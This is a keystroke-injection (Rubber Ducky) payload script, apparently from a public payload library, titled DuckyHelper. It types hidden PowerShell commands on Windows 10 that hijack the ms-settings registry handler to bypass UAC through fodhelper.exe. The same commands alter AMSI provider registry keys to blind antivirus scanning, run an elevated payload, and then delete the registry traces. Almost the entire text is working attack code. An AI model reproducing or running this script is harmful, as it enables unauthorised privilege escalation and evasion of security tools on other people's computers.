Path: blob/master/payloads/library/execution/DuckyHelper/DuckyHelper.txt
3018 views
REM DuckyHelper1REM Version 1.02REM OS: Windows 103REM Author: 0i41E45REM UAC bypass for privilege escalation (Method FodHelper)6REM AV will notify, but payload will still be executed7REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]89DELAY 150010GUI r11DELAY 50012STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass13DELAY 25014ENTER1516DELAY 20017STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo18DELAY 10019STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e20DELAY 10021STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC22DELAY 10023STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H24DELAY 10025STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys26DELAY 10027STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 328DELAY 10029ENTER3031DELAY 500032GUI r33DELAY 50034STRING powershell -NoP -NonI -Exec Bypass35DELAY 25036ENTER3738DELAY 20039STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force40DELAY 10041ENTER4243DELAY 30044STRING exit45DELAY 10046ENTER474849